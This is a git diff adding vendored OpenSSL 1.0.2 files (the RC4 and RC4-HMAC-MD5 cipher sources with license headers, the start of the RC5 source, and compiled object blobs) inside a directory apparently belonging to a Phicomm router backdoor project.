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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.c
new file mode 100644
index 0000000..08e48f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.c
@@ -0,0 +1,133 @@
+/* crypto/evp/e_rc4.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_RC4
+
+# include <openssl/evp.h>
+# include "evp_locl.h"
+# include <openssl/objects.h>
+# include <openssl/rc4.h>
+
+/* FIXME: surely this is available elsewhere? */
+# define EVP_RC4_KEY_SIZE                16
+
+typedef struct {
+    RC4_KEY ks;                 /* working key */
+} EVP_RC4_KEY;
+
+# define data(ctx) ((EVP_RC4_KEY *)(ctx)->cipher_data)
+
+static int rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc);
+static int rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                      const unsigned char *in, size_t inl);
+static const EVP_CIPHER r4_cipher = {
+    NID_rc4,
+    1, EVP_RC4_KEY_SIZE, 0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    rc4_init_key,
+    rc4_cipher,
+    NULL,
+    sizeof(EVP_RC4_KEY),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+static const EVP_CIPHER r4_40_cipher = {
+    NID_rc4_40,
+    1, 5 /* 40 bit */ , 0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    rc4_init_key,
+    rc4_cipher,
+    NULL,
+    sizeof(EVP_RC4_KEY),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+const EVP_CIPHER *EVP_rc4(void)
+{
+    return (&r4_cipher);
+}
+
+const EVP_CIPHER *EVP_rc4_40(void)
+{
+    return (&r4_40_cipher);
+}
+
+static int rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc)
+{
+    RC4_set_key(&data(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx), key);
+    return 1;
+}
+
+static int rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                      const unsigned char *in, size_t inl)
+{
+    RC4(&data(ctx)->ks, inl, in, out);
+    return 1;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.o
new file mode 100644
index 0000000000000000000000000000000000000000..5ce93d64616b56dd9a6989f82cdebcf35c0b1434
GIT binary patch
literal 2616
zcmb`ITWb?h5XUD?wNW&!mxqEP5kwU2l4|e@k~F4GA!vxH6cx6cxVFVK37ZY16||r)
zp$h#9;)@@lj}<|D@-v7}J}Ua8g3kZ!nP%Or3hKb_%>2&Goa>%_kSk0ML?R>-p-a^B
zgc5bO_w2MX(=<$R`ZRp#OL4mUA;0#ZlkdJMbYHwj>jrAvc!}0bdAj@gTE6?Ws9N%C
z_d12{yY4IH-B5uyGq+S|{>e5Z|6~LFMl5baUn-Gx>^HG!iVglDAkd7us6V3lf2%*0
z&0a_xo2j(xZaZ<_IBg`y#?Q8uJAVIE(nzL`d)Vt3!^Rjeo~bJ{G(fZo7Uc)B-%}J>
zDN&>|5;?GID7MZ62S2FW4ngPQBeU@s9bq%2`3dOB_{igd%kj~N(aZ5fIX=q%1jnJz
zTRLu+)?m#5({7)_+6~gj?|lsnqM;`ZTxRuiR+K9RWe0-+UmZ0^W|%j)_-c;K4)YV?
zRh(lDne`N*9b7~>{HTvhyT`*%LzFP8eu>h~e#j(BLw)=l6RdMkt}qDWrC;#cFL;Of
zUY_wZYl!UaD%;>QfGonvHl1q9s1m=;>SA-jc9gkTUv$m8_A)s=oHA2Mi7}@NS0^$B
z^XlZ}wOrXOXC?|clS<hX<*paa>~t}oE1B8yENYlFyFTwOpw(>IURgwOmns@vr;^^d
z_IXO3h+($BefMO{$FWYrFZ%c%A1`Xo-;>%kIqRZ@OPx_2k8_PSIbVqY*Dhh5A;I`n
zMSEPkl+Xrh;}OAmfC!g<=M?R6*-tmXWk1PiEibuNg|+K=dO<A5u33g_cU&@VTdqY$
zrPU%sQTVV7r(x6@RjWouwXw8h*EzP{aBYL{q_LK3RqtwlzTP&PPNQi%?y|07FPL{6
zYsuCl`!|)~bgZfGx1<WD)tkuDS`=daa)2G&CTTxpdqZC_vTr#5$dxZ$_W!8n!JFzS
z^Dqhaf0Bbx^KbLda4u>F^Ea76HaxZUPHb78G0rM%{z-iW&gpo}A1F9~oHO*VKS#Da
z>F9~deJfn%FB<oi*b)Q%EDVOkR+!<|^nWAl(sP}kfa4Pxzn~R15E{&Xt@BqUQ0riR
zn|av!t%s~1Zhgs@^ApxLy2|STz18E`%`6_0k3URs?-|iCeSX*A_(Yf6BDe#?@;~VD
LKiZ1)j9~r`;<(f<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.c
new file mode 100644
index 0000000..80735d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.c
@@ -0,0 +1,302 @@
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <stdio.h>
+#include <string.h>
+
+#if !defined(OPENSSL_NO_RC4) && !defined(OPENSSL_NO_MD5)
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/rc4.h>
+# include <openssl/md5.h>
+
+# ifndef EVP_CIPH_FLAG_AEAD_CIPHER
+#  define EVP_CIPH_FLAG_AEAD_CIPHER       0x200000
+#  define EVP_CTRL_AEAD_TLS1_AAD          0x16
+#  define EVP_CTRL_AEAD_SET_MAC_KEY       0x17
+# endif
+
+/* FIXME: surely this is available elsewhere? */
+# define EVP_RC4_KEY_SIZE                16
+
+typedef struct {
+    RC4_KEY ks;
+    MD5_CTX head, tail, md;
+    size_t payload_length;
+} EVP_RC4_HMAC_MD5;
+
+# define NO_PAYLOAD_LENGTH       ((size_t)-1)
+
+void rc4_md5_enc(RC4_KEY *key, const void *in0, void *out,
+                 MD5_CTX *ctx, const void *inp, size_t blocks);
+
+# define data(ctx) ((EVP_RC4_HMAC_MD5 *)(ctx)->cipher_data)
+
+static int rc4_hmac_md5_init_key(EVP_CIPHER_CTX *ctx,
+                                 const unsigned char *inkey,
+                                 const unsigned char *iv, int enc)
+{
+    EVP_RC4_HMAC_MD5 *key = data(ctx);
+
+    RC4_set_key(&key->ks, EVP_CIPHER_CTX_key_length(ctx), inkey);
+
+    MD5_Init(&key->head);       /* handy when benchmarking */
+    key->tail = key->head;
+    key->md = key->head;
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    return 1;
+}
+
+# if     !defined(OPENSSL_NO_ASM) &&     ( \
+        defined(__x86_64)       || defined(__x86_64__)  || \
+        defined(_M_AMD64)       || defined(_M_X64)      || \
+        defined(__INTEL__)              ) && \
+        !(defined(__APPLE__) && defined(__MACH__))
+#  define STITCHED_CALL
+# endif
+
+# if !defined(STITCHED_CALL)
+#  define rc4_off 0
+#  define md5_off 0
+# endif
+
+static int rc4_hmac_md5_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    EVP_RC4_HMAC_MD5 *key = data(ctx);
+# if defined(STITCHED_CALL)
+    size_t rc4_off = 32 - 1 - (key->ks.x & (32 - 1)), /* 32 is $MOD from
+                                                       * rc4_md5-x86_64.pl */
+        md5_off = MD5_CBLOCK - key->md.num, blocks;
+    unsigned int l;
+    extern unsigned int OPENSSL_ia32cap_P[];
+# endif
+    size_t plen = key->payload_length;
+
+    if (plen != NO_PAYLOAD_LENGTH && len != (plen + MD5_DIGEST_LENGTH))
+        return 0;
+
+    if (ctx->encrypt) {
+        if (plen == NO_PAYLOAD_LENGTH)
+            plen = len;
+# if defined(STITCHED_CALL)
+        /* cipher has to "fall behind" */
+        if (rc4_off > md5_off)
+            md5_off += MD5_CBLOCK;
+
+        if (plen > md5_off && (blocks = (plen - md5_off) / MD5_CBLOCK) &&
+            (OPENSSL_ia32cap_P[0] & (1 << 20)) == 0) {
+            MD5_Update(&key->md, in, md5_off);
+            RC4(&key->ks, rc4_off, in, out);
+
+            rc4_md5_enc(&key->ks, in + rc4_off, out + rc4_off,
+                        &key->md, in + md5_off, blocks);
+            blocks *= MD5_CBLOCK;
+            rc4_off += blocks;
+            md5_off += blocks;
+            key->md.Nh += blocks >> 29;
+            key->md.Nl += blocks <<= 3;
+            if (key->md.Nl < (unsigned int)blocks)
+                key->md.Nh++;
+        } else {
+            rc4_off = 0;
+            md5_off = 0;
+        }
+# endif
+        MD5_Update(&key->md, in + md5_off, plen - md5_off);
+
+        if (plen != len) {      /* "TLS" mode of operation */
+            if (in != out)
+                memcpy(out + rc4_off, in + rc4_off, plen - rc4_off);
+
+            /* calculate HMAC and append it to payload */
+            MD5_Final(out + plen, &key->md);
+            key->md = key->tail;
+            MD5_Update(&key->md, out + plen, MD5_DIGEST_LENGTH);
+            MD5_Final(out + plen, &key->md);
+            /* encrypt HMAC at once */
+            RC4(&key->ks, len - rc4_off, out + rc4_off, out + rc4_off);
+        } else {
+            RC4(&key->ks, len - rc4_off, in + rc4_off, out + rc4_off);
+        }
+    } else {
+        unsigned char mac[MD5_DIGEST_LENGTH];
+# if defined(STITCHED_CALL)
+        /* digest has to "fall behind" */
+        if (md5_off > rc4_off)
+            rc4_off += 2 * MD5_CBLOCK;
+        else
+            rc4_off += MD5_CBLOCK;
+
+        if (len > rc4_off && (blocks = (len - rc4_off) / MD5_CBLOCK) &&
+            (OPENSSL_ia32cap_P[0] & (1 << 20)) == 0) {
+            RC4(&key->ks, rc4_off, in, out);
+            MD5_Update(&key->md, out, md5_off);
+
+            rc4_md5_enc(&key->ks, in + rc4_off, out + rc4_off,
+                        &key->md, out + md5_off, blocks);
+            blocks *= MD5_CBLOCK;
+            rc4_off += blocks;
+            md5_off += blocks;
+            l = (key->md.Nl + (blocks << 3)) & 0xffffffffU;
+            if (l < key->md.Nl)
+                key->md.Nh++;
+            key->md.Nl = l;
+            key->md.Nh += blocks >> 29;
+        } else {
+            md5_off = 0;
+            rc4_off = 0;
+        }
+# endif
+        /* decrypt HMAC at once */
+        RC4(&key->ks, len - rc4_off, in + rc4_off, out + rc4_off);
+        if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */
+            MD5_Update(&key->md, out + md5_off, plen - md5_off);
+
+            /* calculate HMAC and verify it */
+            MD5_Final(mac, &key->md);
+            key->md = key->tail;
+            MD5_Update(&key->md, mac, MD5_DIGEST_LENGTH);
+            MD5_Final(mac, &key->md);
+
+            if (memcmp(out + plen, mac, MD5_DIGEST_LENGTH))
+                return 0;
+        } else {
+            MD5_Update(&key->md, out + md5_off, len - md5_off);
+        }
+    }
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    return 1;
+}
+
+static int rc4_hmac_md5_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg,
+                             void *ptr)
+{
+    EVP_RC4_HMAC_MD5 *key = data(ctx);
+
+    switch (type) {
+    case EVP_CTRL_AEAD_SET_MAC_KEY:
+        {
+            unsigned int i;
+            unsigned char hmac_key[64];
+
+            memset(hmac_key, 0, sizeof(hmac_key));
+
+            if (arg > (int)sizeof(hmac_key)) {
+                MD5_Init(&key->head);
+                MD5_Update(&key->head, ptr, arg);
+                MD5_Final(hmac_key, &key->head);
+            } else {
+                memcpy(hmac_key, ptr, arg);
+            }
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36; /* ipad */
+            MD5_Init(&key->head);
+            MD5_Update(&key->head, hmac_key, sizeof(hmac_key));
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36 ^ 0x5c; /* opad */
+            MD5_Init(&key->tail);
+            MD5_Update(&key->tail, hmac_key, sizeof(hmac_key));
+
+            return 1;
+        }
+    case EVP_CTRL_AEAD_TLS1_AAD:
+        {
+            unsigned char *p = ptr;
+            unsigned int len = p[arg - 2] << 8 | p[arg - 1];
+
+            if (!ctx->encrypt) {
+                len -= MD5_DIGEST_LENGTH;
+                p[arg - 2] = len >> 8;
+                p[arg - 1] = len;
+            }
+            key->payload_length = len;
+            key->md = key->head;
+            MD5_Update(&key->md, p, arg);
+
+            return MD5_DIGEST_LENGTH;
+        }
+    default:
+        return -1;
+    }
+}
+
+static EVP_CIPHER r4_hmac_md5_cipher = {
+# ifdef NID_rc4_hmac_md5
+    NID_rc4_hmac_md5,
+# else
+    NID_undef,
+# endif
+    1, EVP_RC4_KEY_SIZE, 0,
+    EVP_CIPH_STREAM_CIPHER | EVP_CIPH_VARIABLE_LENGTH |
+        EVP_CIPH_FLAG_AEAD_CIPHER,
+    rc4_hmac_md5_init_key,
+    rc4_hmac_md5_cipher,
+    NULL,
+    sizeof(EVP_RC4_HMAC_MD5),
+    NULL,
+    NULL,
+    rc4_hmac_md5_ctrl,
+    NULL
+};
+
+const EVP_CIPHER *EVP_rc4_hmac_md5(void)
+{
+    return (&r4_hmac_md5_cipher);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.o
new file mode 100644
index 0000000000000000000000000000000000000000..f58dd3dfda1bead850c02bcadf87d326a4b09d43
GIT binary patch
literal 4088
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
EUz$Mw&;S4c

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc5.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc5.c
new file mode 100644
index 0000000..f17e99d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc5.c
@@ -0,0 +1,122 @@
+/* crypto/evp/e_rc5.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
